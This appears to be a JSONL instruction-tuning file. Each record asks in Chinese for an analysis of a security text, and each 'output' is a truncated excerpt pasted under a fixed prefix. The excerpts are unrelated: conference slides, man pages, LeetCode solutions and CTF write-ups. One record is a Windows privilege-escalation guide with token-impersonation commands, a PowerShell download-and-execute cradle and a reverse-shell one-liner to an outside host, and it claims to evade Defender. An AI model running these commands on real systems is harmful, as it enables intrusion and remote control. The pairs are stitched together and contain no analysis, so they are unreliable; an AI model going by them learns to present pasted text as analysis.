{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLinux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles Duncan Woodbury, Nicholas Haltmeyer {p3n3troot0r@protonmail.com, ginsback@protonmail.com} July 29, 2017 p3n3troot0r, ginsback DEFCON V2X July 29, 2017 1 / 38 State of the World: (Semi)Autonomous Driving Technologies Vehicular automation widespread in global industry Automated driving technologies becoming accessible to general public Comms protocols used today in vehicular networks heavily flawed New automated technologies still using CANBUS and derivatives p3n3troot0r, ginsback DEFCON V2X July 29, 2017 2 / 38 Stages of Autonomy Today: Stage 2 Autonomy - Combined Function Automation V2X: Stage 3 Autonomy - Combined Function Automation ) Leverage vehicular ad hoc mesh network for exchange of safety and actor/world state information p3n3troot0r, ginsback DEFCON V2X July 29, 2017 3 / 38 Critical Aspects of V2X Reliable high-throughput ad hoc mesh networking and exchange in a real-time cyberphysical environment Standardization of Stage 3 automation in federal and consumer transportation systems Enhanced safety and traffic optimization technologies leveraging V2X p3n3troot0r, ginsback DEFCON V2X July 29, 2017 4 / 38 Technologies Using V2X Collision avoidance (Forward Collision Warning) systems Advanced Driver Assistance Systems (ADAS) Cooperative adaptive cruise control Automated ticketing and tolling p3n3troot0r, ginsback DEFCON V2X July 29, 2017 5 / 38 Impact of V2X: Why Care? Most importantly: self-driving cars are shiny Your children will (would) ride in these Enables safety functions not possible with onboard systems V2X technologies applicable across range of cyberphysical systems NHTSA V2V NPRM: V2V to be standardized in light vehicles Its happening: You want in? p3n3troot0r, ginsback DEFCON V2X July 29, 2017 6 / 38 Tangible Benefits According to the USDOT, Safety Prevent 25,000 to 592,000 crashes annually Save 49 to 1,083 lives Avoid 11,000 to 270,000 injuries Prevent 31,000 to 728,000 property ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 令牌伪造 令牌伪造这种技术可以用本地管理员的权限模拟登陆到其他计算机上比如登陆到域管的机器上 ## powershell 使用powershell的模块可以达到令牌伪造的目的生成一个新进程作为你模拟的用户但是可以在同一个线程内工作所以你输入`whoami`可能回显出的是原始用户名但你仍然拥有目标用户的权限 这个时候你迁移新的进程到这个进程就拥有了目标用户的shell 这个模块在powersploit中 ``` https://github.com/PowerShellMafia/PowerSploit/blob/c7985c9bc31e92bb6243c177d7d1d7e68b6f1816/Exfiltration/Invoke-TokenManipulation.ps1 ``` 作为域用户调用令牌伪造没作用的话可以尝试模拟SYSTEM然后使用mimikatz dump凭据 ``` Invoke-TokenManipulation -ImpersonateUser -Username \"lab\\domainadminuser\" Invoke-TokenManipulation -ImpersonateUser -Username \"NT AUTHORITY\\SYSTEM\" Get-Process wininit | Invoke-TokenManipulation -CreateProcess \"cmd.exe\" ``` 或者 ``` Get-Process wininit | Invoke-TokenManipulation -CreateProcess \"Powershell.exe -nop -exec bypass -c \\\"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\\\"};\" ``` ## 利用邪恶土豆 邪恶土豆是一种特权升级技术允许通过令牌伪造从服务级别帐户升级到SYSTEM权限账户可以通过在Empire或Metasploit中上传一个exe文件漏并执行或通过内存注入psinject来实现有关更多详细信息请参阅Foxglove security对漏洞的介绍---->https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ ### Meterpreter 获取一个普通用户的`meterpreter shell`并将rot.exe上传到这个机器  ``` getuid显示用户身份 whoami getprivs 显示有效的token getsystem如果是本地管理员则允许直接在meterpreter中进行SYSTEM令牌伪造 use incognito 列出可用的扩展 list_tokens -u 列出可用的token ``` 也可以将它作为dll上传到磁盘中并使用rundll32来执行它 ``` execute -H -c -m -d calc.exe -f /root/rot.exe upload rot.dll \"c:\\temp\\rot.dll\" execute -H -c -f \"rundll32 c:\\temp\\rot.dll ``` 再次执行一下`list_tokens -u`试试 然后就是冒充system了 ``` impersonate_token \"NT AUTHORITY\\SYSTEM\" ``` okget system ## Lonely potato (译者注这老毛子起的名字怎么这么奇葩的孤独的土豆上面个叫烂土豆) https://decoder.cloud/2017/12/23/the-lonely-potato/ https://github.com/decoder-it/lonelypotato 我在Windows 10上使用Defender做了测试没有触发报警你也可以实现一个更好的混淆然后反弹shell 创建一个反弹shell的powershell文件 ``` powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.0.9',53);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrontrunning the Frontrunners D r . P a u l V i x i e , C E O F a r s i g h t S e c u r i t y , I n c .  Copyright 2016 Farsight Security, Inc. All Right Reserved. Introduction Frontrunners Exploit Non-Public Information To Register Domain Names For Profit  \"This Advisory considers the opportunity for a party with some form of insider information to track an Internet users preference for registering a domain name and preemptively register that name. SSAC likens this activity to front running in stock and commodities markets and calls this behavior domain name front running. In the domain name industry, insider information would be information gathered from the monitoring of one or more attempts by an Internet user to check the availability of a domain name.\" \"SAC 022: SSAC Advisory on Domain Name Front Running,\" ICANN Security and Stability Advisory Committee, October 2007, [emphasis added] https://www.icann.org/en/system/files/files/sac-022-en.pdf Classic \"Add Grace Period\" Frontrunning Was Terminated By ICANN Policy Changes  \"In response to community concerns about the excessive use and abuse of the five-day AGP (Add Grace Period), ICANN implemented two measures to address these problems that have resulted in a 99.7% decrease in AGP deletes from June 2008 to April 2009. [* * *] The solution in brief means that if a company registers and then returns more than a certain number or percentage of domains each month, they are charged for each additional registration above that amount. The result is that domain tasting becomes increasingly expensive the more a company engages in the practice [...] \"Aside from the problem that domain names may have been difficult to register, domain tasting also had a series of negative consequences on the manner in which people used the Internet. If individuals accidentally allowed their domain names to lapse, it had become extremely difficult for them to get the domain back (since it was being picked up and dropped by automated systems", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n流量宝藏 01 目录 解决数据孤岛 时效性 背景介绍 反入侵防漏洞 态势感知主动对抗高级威胁 重点目标 主机和应用层漏洞发现 实践探索 挖矿DN S安全协议层面的分析 背景介绍 核心思想  多层防御体系  网络流量雁过留痕 流量安全分析 应用层 主机层 网络层 重点目标 02 重点目标 信息搜集 漏洞探测 漏洞利用 权限维持 持续渗透 网络流量数据 算法层 应用场景 处理层 逻辑架构  覆盖多种场景  不同的算法适配 重点目标  高危行为  高危组件覆盖 防漏洞 重点目标  木马流量  隧道流量 反入侵 实践尝试 03 实践尝试 传统主机安全检测响应EDR系 统通过Agent方式采集主机日 志命令操作等信息然后上报 到控制中心进行策略建模从而 发现主机入侵威胁比如高风险 命令注入执行单纯基于主机端 数据仅能知道发生了什么若同 时能在流量层面针对这些强特征 命令字进行检测进一步关联 就能溯源到攻击者是如何利用的 此外流量层的检测能力也能 主机安全回溯 主机层发现的告警 流量层感知的网络路径和请求形成关联 实践尝试 ICMP木马进程也不会监听 端口对主机层检测能力提出 更大挑战由于在协议栈之前 对流量进行劫持处理主机端 tcpdump也无法抓取而作为 中间管道在流量层进行检测 分析会是更好的补充手段 木马通信 从源主机向目标主机129.226.x.x进行ping操作可以正常ping通 在目标主机上使用tcp d um p 抓取源主机1 1 5.1 59.x .x 的包无法抓获 实践尝试 1.高危端口高危组件和高危服务的对外开放 占据了漏洞攻击的很大部分靠主动扫描来感 知存在扫描周期和扫描被屏蔽的问题 2.通过流量建立相关通信特征的检测则可以 实现秒级响应业务高危端口从对外开放到被 探测利用的时间只有45秒针对资产数量较 多的大中型企业来说很难在45秒内完成一 轮扫描 3.网络上的大量扫描和探测会带来误报结合 出流量关联则能较好的解决误报问题 高危资产主动发现 实践尝试 1.漏洞扫描一般重点关注在对特征类漏洞 的发现发送特定构造参数或payload以 触发是否存在漏洞对于业务层面的不合 规行为或者逻辑类漏洞则覆盖不足比如 敏感信息明文传输越权管理后台类等 2. 扫描方法基于关键字灵活性和可维护 性不高流量分析可以引入AI算法模 型可以自动学习页面特征效果远超过传 统方案同时引入正负反馈机制配合AI 模型训练提升模型识别率此外这不但 可以监测管理后台的对外开放问题而且 也可以对存在弱口令的管理后台进行告 脆弱点/ 漏洞主动发现 JS生成的管理页面若扫描器不能解析JS则不能主动发现 实践尝试 通过分析Mirai僵尸网络的命令与心跳包提取出 属于Mirai僵尸网络C&C服务器与被控端之间的通 信流量从而感知Mirai僵尸网络的规模变化 攻击指令其中开头的\"001a\"代表攻击指令的长度 紧接着的\"0000001e\"代表了攻击的持续时间为30 秒\"1e\"之后的\"00\"代表了攻击的所采用的手法 根据对大量Mirai样本的逆向\"00\"代表了使用 udp进行攻击后面的\"d39fcd91\"代表了攻击的目 标IP之后的几位是攻击的配置项 \"000431343430\"代表了攻击所使用的udp包大小 为1400\"070439303033\"代表了攻击的目标端 口是9003 Mirai僵尸网络 Mirai攻击指令示例 Mirai僵尸网络规模 实践尝试 流量特征在挖矿程序与交换端点进行通讯时采 用了jsonrpc协议这点与门罗币挖矿相同并且 数据包的强特征明显可以针对数据包中的关键词 或者数据包中的结构进行检测 端口特征Swarm项目在运行时默认使用1633 16341635这三个端口来进行数据交换 加密流量能够在握手协议和证书两个层面来做一 些事情由于挖矿的特殊性矿池的域名证书是 不会轻易进行变化的并且矿池的具有聚集属性 即越大的矿池集合到的矿机越多越能够保证收益 的稳定性所以也可以针对排名较为靠前的矿池进 行域名和证书的收集添加针对性的检测策略 SWARM挖矿 Jsonrpc协议 实践尝试 三大类域名黑白灰的明显不同的 统计特征 建立了一套基于AI+规则的DNS隧道流量 检测系统现网检出的隧道流量大多还是 以正规厂商的DNS隧道及个人测试DNS 隧道工具为主示例如下表所示可以 顺道发现一些与隧道相似大量乱码域名 请求的DGA域名 DNS隧道 隧道流量和普通流量信息熵 隧道流量和 普通流量域名编码特征 展望 04 展望  加密流量https,quic的解决 思路  基于黑特征的检测算法的失效  解决方案接入解密网关同 时对于某些场景需要降低对 黑特征关键字的依赖综合 利用大数据AI等手段构建 基于行为的检测机制比如木 马主控C&C行为的发现 挑战 THANKS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 threat protection | compliance | archiving & governance | secure communication Malware Command and Control Channels - a journey into Darkness - By Brad Woodberg - Emerging Threats Product Manager / Proofpoint 2 Agenda C2 Intro and Background (7 mins) Modern C2 Techniques (6 mins) Case Studies (15 mins) Predictions for C2 (5 mins) Defense (10 mins) Wrap Up (2 mins) 3 Why Command & Control? Vulnerabilities, Exploits, and Malware grab the headlines and analyst focus While very interesting, it is also very noisy, many exploits fail, very FP prone. If you can effectively detect C2 activity, you have a high fidelity indicator that an asset is actually compromised. With C2, the tables are turned on attackers, they go on defense, and we go on offense. 4 T-0: Initial Infection Modern malware is delivered in one of two ways:  Executable Content: Binary executables, embedded executable content like macros typically through web or email channels on the network.  Exploit Driven: An exploit against a software vulnerability such as those against Flash, PDF, Java, Office Docs, Browsers, and other network enabled applications. Regardless of how modern malware compromises a system, it is rarely autonomous. Dridex CVE-2016-4117 Angler EK 5 T-1: Rough Landings Initial malware execution may occur under non-ideal scenarios: Malware may land on a non-target asset Malware may not have sufficient privileges when it executes Malware may be delivered in pieces to evade detection / fit into buffers Malware may require payload before it is malicious (e.g. TinyLoader) Malware may require coordination with C2 for operating instructions before it takes action (e.g. Crypto Ransomware waiting to receive a key) Enter Command and Control 6 T-2: Escalation Complete malware breach by acquiring additional executables, payloads, and configurations.  May be as simple as a word doc downloading an EXE (e.g. Dridex),  Or as complex as a dropper downloading an entirely new malware (e.g. Tinyloader / AbaddonP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n攻防演练中的攻击战术演进 长亭科技 崔勤 变化与机会 甲 方 乙 方 监管 实 战 实战标准下的安全效果更真实 1. 结果导向不限制手法 2. 攻防两端深度参与不再仅仅是一份检测报告体验感更足 3. 低危漏洞安全意识不重要 实战标准的特点 乙 方 实 战 攻防演练 攻防演练是实战视角下最佳验证手段之 一 攻防演练红队 1. 能力象限 2. 框架的演进 3. 决策及思考攻击战术 攻防演练框架演进 以为人为核心到组织矩阵 攻防演练框架的演进  范围  速度  内容  影响范围  利用程度  自动化程度  隐蔽性  对抗能力 攻防演练决策及思考 初始信息收集 初始入侵 站稳脚跟 提升权限 内部信息收集 完成目标 横向移动 维持权限 1. 信息 是APT攻击的第一生产力贯穿APT攻击的整个生命周期优秀的情报能力可以令攻击事半功倍 2. 漏洞 是撕开防线的武器需要依靠信息精确制导 3. 工具 是潜伏敌线刺探情报的间谍主要包括远控日志流量密码窃取等后渗透工具 核心要素 战术总结及思考 - 高效的信息收集自动化 01 02 03 04 搜 集 资 产  IP  域 名  人 员信息等 对资产进行跟 踪针对临时 新增资产辅 助进行蜜罐识 别 识别资产指纹  cms  第 三 方系统组件 中间件等 以便进行漏洞 利用 围绕特定人员 搜集信息以 供社工钓鱼 05 理解业务了 解并选择潜在 的攻击路径 战术总结及思考 - 应用漏洞 vs 基础设施漏洞 应用漏洞 基础设施漏洞 优势 开发成本较低 利用效果好 劣势 维护成本高利用程度差异大 开发成本高 使用范围 互联网扫描阶段 内网重灾区 通用应用软件OAMAIL 降维打击 战术总结及思考 - 供应链安全 1. 外包驻场对客户人员架构不熟悉导致被钓鱼 2. 同一外包开发写出相似漏洞更可怕的逻辑漏洞 3. 软硬件产品VPN虚拟化平台堡垒机OA邮箱等 4. 网络专线与合作方打通 5. 供应商的开发依赖存在安全隐患 战术总结及思考 - 安全厂商对抗 安全/运维/监控设备 Ø 提前储备相关0Day或1day可供内网横纵向扩展利用 Ø 一般以server端控agent端或者先从agent打到server再打其他 agent的形式 Ø 安全设备不安全 战术总结及思考 - 有效权限 攻防演练-展望 攻防演练中的某些问题或环节可能会演变成产品进一步提升普适度覆盖越来越多的客户提 高整体安全水平", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWTF Happened to the Constitution?! The Right to Privacy in the Digital Age Michael theprez98 Schearer DEFCON 19 Las Vegas, NV Michael theprez98 Schearer  Founder and Owner, Leverage Consulting & Associates  8+ years in the U.S. Navy as an EA-6B Prowler Electronic Countermeasures Officer  Veteran of aerial combat missions over Afghanistan and Iraq  Spent 9 months on the ground in Iraq as a counter-IED specialist  Founding member of Church of WiFi and Unallocated Space, and father of four Why you should be skeptical  I am not a lawyer  My presentation is (both) unintentionally and intentionally biased by my own beliefs  This isnt a political presentation, but it is inevitably influenced by political issues  Bottom line: Dont take my word for it; read the source material and make up your own mind! WTF HAPPENED TO THE CONSTITUTION? Part I: History The Right to Privacy  What is it?  Where does it come from? History (1/2)  Magna Carta (1215)  Divine Right of Kings (~1600-88)  Semaynes Case (1604)  Lex, Rex (1644)  The Glorious Revolution (1688)  English Bill of Rights (1689)  Paxsons Case (1760)  William Pitt, Earl of Chatham (1763)  Wilkes v. Wood (1763), Entick v. Carrington (1765) History (2/2)  Malcom Affair (1766)  Virginia Declaration of Rights (1776)  State Constitutions  State Ratifying Conventions  First Congress (1789-91)  Bill of Rights Ratification (1791)  Fourteenth Amendment (1868) Magna Carta (1215)  Proclamation by King John of certain liberties  Kings will was not arbitrary  NO Freeman shall be taken or imprisoned, or be disseised of his...Liberties...but by...the Law of the land. Divine Right of Kings (1600-88)  Monarch derives his right to rule from God  Not subject to the people, laws, or even the Church  Theory was used to justify absolute monarchism Semaynes Case (1604)  Gresham and Berisford--joint tenants  Berisford died and left some papers to Semayne  Sheriff of London, with a valid writ, entered the house by breaking down the doors the house of ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\"t .\\\" @(#)lilo.8 1.0 950728 aeb .\\\" This page is based on the lilo docs, which carry the following .\\\" COPYING condition: .\\\" .\\\" LILO program code, documentation and auxiliary programs are .\\\" Copyright 1992-1994 Werner Almesberger. .\\\" All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms of parts of or the .\\\" whole original or derived work are permitted provided that the .\\\" original work is properly attributed to the author. The name of the .\\\" author may not be used to endorse or promote products derived from .\\\" this software without specific prior written permission. This work .\\\" is provided \"as is\" and without any express or implied warranties. .\\\" .\\\" Original version, Andries Brouwer (aeb@cwi.nl), 950728 .\\\" Added t directive, as Daniel Quinlan asked, 950824 .\\\" .TH LILO 8 \"28 July 1995\" .SH NAME lilo \\- 安装引导装入程序 .SH 总述 主要功能: .LP .B  /sbin/lilo \\- 安装引导装入程序 .LP 辅助用途: .LP .B /sbin/lilo q \\- 查询影射表 .br .B /sbin/lilo R \\- 设置下次启动的默认命令行 .br .B /sbin/lilo I \\- 查询当前内核的路径 .br .B /sbin/lilo {-u|-U} \\- 卸载lilo .SH 使用说明 .LP lilo 安装一个你在下一次启动时被激活的引导装入程序 它有多项的选择. .LP .TP .B \\-\\v 增加冗余.给出一个或更多的-v选项 使lilo 更详细. .TP .B \\-\\q 列表当前已被影射的文件. .B lilo 维护着一个文件,缺省的是 .IR /boot/map, 包含了启动内核的名称和定位位置 这个选项列出在其中的名字. .BI \\-\\m  影射文件名 使用指定的影射文件代替默认的. .TP .BI \\-\\C 配置文件名 .B lilo 从这个文件中读取有关影射文件的指令, 省缺的是 .IR /etc/lilo.conf. 这个选项能使用一个指定的非默认的配置文件. .TP .BI \\-\\d  延迟 如果你有几个指定的内核, 在启动时按下Shift 键, 引导程序会提供一个你选 择使用哪个系统内核去启动的机会. 一个预期的时间后列表的第一项将被引导. 这个选项指定一个以十分之一秒为单位的超时延迟. .TP .BI \\-\\D  标记 使用给出标记的内核去代替第一个来作为默认的引导. .TP .BI \\-\\r  root-目录 做任何修改之前改变root的位置到指出的目录. 习惯上用于纠正从软盘启动的安装. .TP .BI \\-\\t  只进行测试. 不会真正的写入新的启动或影射文件. 和\\fB-v\\fP一起使用得知.B lilo 大约有什么要做. .TP .B \\-\\c  影射压缩.将合并读入从临近部分的请求. 加速启动(尤其从软盘). .TP .BI \\-\\f  disk-tab 指定磁盘参数文件. (省缺的是 .IR /etc/disktab.) .TP .BI \\-\\i  boot-sector 指定一个文件作为boot sector使用.(省缺的是 .IR /boot/boot.b.) .TP .BI \\-\\l  产生线性sector地址代替sector/head/cylinder 地址. .TP .BI \\-\\P  {fix|ignore} 修理(或忽略)被破坏的分区表, 例如, 分区表用线性的和sector/head/cylinder 地址不协调. .TP .BI \\-\\s  save-file 当 .B ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWMAP: Metasploit goes Web ET Introduction  No agenda in this presentation  No Sun Wu Tzu The Art of War Stuff In this presentation either.  #nomorefree-art-of-war-stuff-in-security- presentations.  No history of web scanners Introduction  Efrain Torres  2*5+ years enjoying IT security  Metasploit team  et [at] metasploit.com WMAP  Web assessment as Metasploit auxiliary modules  Run modules by hand or automated  Still early stages  blame it to the crisis  Metasploit Prime (SecTor 08)  Expect a big announcement soon!, HD  This is it. WMAP  Why?  Struggle with tools that find vulnerabilities while browsing an application.  Easy way to get detected by IDS/IPS  Crawl as a user.  Attack like a ninja later.  Suffering by tools that can only be run on windows environments.  Tied to a specific browser  IE Control. (You are assuming the target is good and no evil) WMAP  Why?  Too much focus on whistles and bells.  When was the last time a pie chart was useful for you.  No more crap regarding vulnerabilities classification and risks.  Sometimes a High is just a Low  (I'm not talking about FPs)  And a couple of Lows can get you High  What the hell is a High, Medium, Low?  Real Impact? WMAP NO YES WMAP  Objectives  A way to tie testing methods with exploitation methods  Make something useful to help in the assessment of anything related to HTTP/S  WMAP may be used as a scanner but it should be treated as an extension of the Metasploit framework. WMAP  The more web assessment/scanners/etc tools the better.  Each tool has its own limitations, pros and cons.  Choose the damn tool you like (its just a tool)  A Poor Workman Blames His Tools  W3AF is awesome.  SQLmap is awesome.  _________ WMAP Multiple Clients Any Proxy Metasploit DB Simple modules Ruby WMAP  db_wmap  Identify possible targets  Build target website structure  Run the modules in a specific order  Reporting msf > load db_wmap [*] =[ WMAP v0.5 - ET LoWNOISE [*] Successfully loaded plugin: db_wmap msf > db_create /path/t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"MACHINE\\-ID\" \"5\" \"\" \"systemd 231\" \"machine-id\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" machine-id \\- 本机\"machine ID\"配置文件 .SH \"SYNOPSIS\" .PP /etc/machine\\-id .SH \"描述\" .PP /etc/machine\\-id 文件包含一个 在安装操作系统时生成的专属于本系统的独一无二的\"machine ID\" \"machine ID\"是一个32字符长度的十六进制小写字母字符串 并以换行符结尾 其本质是一个128位二进制整数的16进制表示 .PP \"machine ID\"通常在系统安装时从一个随机数源生成 并且之后无论经过多少次开关机也一直保持不变 另一方面对于无状态系统如果此文件为空 将在系统启动的早期自动随机生成一个 .PP \"machine ID\"一旦生成应该永远保持不变 即使系统的硬件发生了变化也不应该修改它 .PP 这里的\"machine ID\"与\"D\\-Bus machine ID\" 遵守相同的格式与逻辑 .PP 无论主机的网络配置如何变化 应用程序始终可以使用\"machine ID\" 在全球范围内精确的识别一台主机基于上述特性 \"machine ID\" 机制可用于取代 POSIX 的 \\fBgethostid\\fR(3) 系统调用功能 .PP 操作系统的安装程序可以在安装时使用 \\fBsystemd-machine-id-setup\\fR(1) 工具来初始化\"machine ID\" 可以使用 \\fBsystemd-firstboot\\fR(1) 初始化已挂载(但未启动)的系统镜像的\"machine ID\" .PP 还可以通过 \\fIsystemd\\&.machine_id=\\fR 内核引导选项 或者 systemd 的 \\fB\\-\\-machine\\-id=\\fR 命令行选项 来设置\"machine ID\"这种方式经常用于网络启动的场景中 注意不可将\"machine ID\"设为全零值 .SH \"与 OSF UUID 的关系\" .PP \"machine ID\"符合 \\m[blue]\\fBRFC 4122\\fR\\m[]\\&\\s-2\\u[1]\\d\\s+2 规范(OSF v4 UUID) 同时也符合 Microsoft GUID 规范 .SH \"历史\" .PP /etc/machine\\-id 文件的格式源自D\\-Bus的 /var/lib/dbus/machine\\-id 文件 实际上/var/lib/dbus/machine\\-id 很可能就是指向 /etc/machin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## dub-key (crypto, 120p) > My friend set up a small signing scheme, however she won't let me sign stuff. Can you get it signed? > > Find it at dub-key-t8xd5pn6.9447.plumbing port 9447 > > [dub-key.py](dub-key.py) ###PL [ENG](#eng-version) Rozpoczeliśmy od analizy algorytmu podpisywania i jego własności (w skrócie - podpisywanie polega na tym że zmieniamy wiadomość w graf, i podpis to iloczyn długości wszystkich cykli w wiadomości). Niestety, nie udało nam się skończyć pisać pełnego ataku przed końcem CTFa, ale w ostatnich godzinach zdecydowaliśmy się wykonać trywialny atak na algorytm podpisywania. Otóż w tym zadaniu możemy podpisać dowolną wiadomość poza jedną - tą którą mamy podpisać żeby dostać flagę. Zauważyliśmy, że jeśli zmienimy tylko jeden bajt w wiadomości i podpiszemy go, to jest spora szansa że podpis się nie zmieni Oszacowaliśmy tą szansę jako pesymistycznie 1/(256*e), ale prawdopodobnie znacznie większą - i rzeczywiście, w praktyce już po kilkudziesięciu sprawdzeniach udało się. Pomysł sprowadza się do: msg = odbierz_wiadomość_do_podpisania() msg1 = msg[-1] + '\\x00' sig1 = podpisz(msg1) wyślij_podpis(sig1) Tak więc nasz cały kod atakujący wyglądał tak: ```python import hashlib import socket import string import itertools import base64 def pow(init): for c in itertools.product(string.lowercase, repeat=6): dat = init + ''.join(c) hash = hashlib.sha1(dat) if hash.digest().endswith('\\x00\\x00\\x00'): return dat def recv(): return s.recv(99999) return r def send(msg): s.send(msg) while True: HOST, PORT = 'dub-key-t8xd5pn6.9447.plumbing', 9447 s = socket.socket() s.connect((HOST, PORT)) inp = recv() print inp p = pow(inp) send(p) r = recv() tosign = recv().split(\"\\n\")[0] dat = base64.b64decode(tosign) dat = dat[:-1] + '\\x00' send('1\\n') send(base64.b64encode(dat)) r = recv() # podpisane dane t = recv() # sign something send('2\\n') send(r) print recv(), recv(), recv() ``` I, co zaskakujące, zadziałał za pierwszym razem. Flaga: 9447{Th1s_ta5k_WAs_a_B1T_0F_A_DaG}", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Leetcode 题解 - 数组与矩阵 <!-- GFM-TOC --> * [Leetcode 题解 - 数组与矩阵](#leetcode-题解---数组与矩阵) * [1. 把数组中的 0 移到末尾](#1-把数组中的-0-移到末尾) * [2. 改变矩阵维度](#2-改变矩阵维度) * [3. 找出数组中最长的连续 1](#3-找出数组中最长的连续-1) * [4. 有序矩阵查找](#4-有序矩阵查找) * [5. 有序矩阵的 Kth Element](#5-有序矩阵的-kth-element) * [6. 一个数组元素在 [1, n] 之间其中一个数被替换为另一个数找出重复的数和丢失的数](#6-一个数组元素在-[1-n]-之间其中一个数被替换为另一个数找出重复的数和丢失的数) * [7. 找出数组中重复的数数组值在 [1, n] 之间](#7-找出数组中重复的数数组值在-[1-n]-之间) * [8. 数组相邻差值的个数](#8-数组相邻差值的个数) * [9. 数组的度](#9-数组的度) * [10. 对角元素相等的矩阵](#10-对角元素相等的矩阵) * [11. 嵌套数组](#11-嵌套数组) * [12. 分隔数组](#12-分隔数组) <!-- GFM-TOC --> ## 1. 把数组中的 0 移到末尾 283\\. Move Zeroes (Easy) [Leetcode](https://leetcode.com/problems/move-zeroes/description/) / [力扣](https://leetcode-cn.com/problems/move-zeroes/description/) ```html For example, given nums = [0, 1, 0, 3, 12], after calling your function, nums should be [1, 3, 12, 0, 0]. ``` ```java public void moveZeroes(int[] nums) { int idx = 0; for (int num : nums) { if (num != 0) { nums[idx++] = num; } } while (idx < nums.length) { nums[idx++] = 0; } } ``` ## 2. 改变矩阵维度 566\\. Reshape the Matrix (Easy) [Leetcode](https://leetcode.com/problems/reshape-the-matrix/description/) / [力扣](https://leetcode-cn.com/problems/reshape-the-matrix/description/) ```html Input: nums = [[1,2], [3,4]] r = 1, c = 4 Output: [[1,2,3,4]] Explanation: The row-traversing of nums is [1,2,3,4]. The new reshaped matrix is a 1 * 4 matrix, fill it row by row by using the previous list. ``` ```java public int[][] matrixReshape(int[][] nums, int r, int c) { int m = nums.length, n = nums[0].length; if (m * n != r * c) { return nums; } int[][] reshapedNums = new int[r][c]; int index = 0; for (int i = 0; i < r; i++) { for (int j = 0; j < c; j++) { reshapedNums[i][j] = nums[index / n][index % n]; index++; } } return reshapedNums; } ``` ## 3. 找出数组中最长的连续 1 485\\. Max Consecutive Ones (Easy) [Leetcode](https://leetcode.com/problems/max-consecutive-ones/description/) / [力扣](https://leetcode-cn.com/problems/max-consecutive-ones/description/) ```java public ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# KeyGenMe Reversing, 423 points ## Description: A binary file was attached, in addition to an address and port. ## Solution: Let's run the binary: ```console root@kali:/media/sf_CTFs/tamu/KeyGenMe# ./keygenme Please Enter a product key to continue: ``` So we'll need a valid product key in order to proceed. Let's open in a disassembler: ```console root@kali:/media/sf_CTFs/tamu/KeyGenMe# r2 keygenme -- Finnished a beer [0x00000820]> aaa [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Constructing a function name for fcn.* and sym.func.* functions (aan) [x] Type matching analysis for all functions (afta) [x] Use -AA or aaaa to perform additional experimental analysis. [0x00000820]> afl 0x00000000 10 459 -> 461 sym.imp.__libc_start_main 0x00000750 3 23 sym._init 0x00000780 1 6 sym.imp.puts 0x00000790 1 6 sym.imp.strlen 0x000007a0 1 6 sym.imp.__stack_chk_fail 0x000007b0 1 6 sym.imp.printf 0x000007c0 1 6 sym.imp.fgets 0x000007d0 1 6 sym.imp.strcmp 0x000007e0 1 6 sym.imp.malloc 0x000007f0 1 6 sym.imp.setvbuf 0x00000800 1 6 sym.imp.fopen 0x00000810 1 6 sub.__cxa_finalize_810 0x00000820 1 43 entry0 0x00000850 4 50 -> 40 sym.deregister_tm_clones 0x00000890 4 66 -> 57 sym.register_tm_clones 0x000008e0 5 58 -> 51 sym.__do_global_dtors_aux 0x00000920 1 10 entry1.init 0x0000092a 4 176 sym.enc 0x000009da 5 108 sym.verify_key 0x00000a46 8 244 main 0x00000b40 3 101 -> 92 sym.__libc_csu_init 0x00000bb0 1 2 sym.__libc_csu_fini 0x00000bb4 1 9 sym._fini [0x00000820]> s sym.main ``` An overview of `main` is: ``` .---------------------------------------------------------. | [0xa46] | | 0x00000a67 size_t size | | 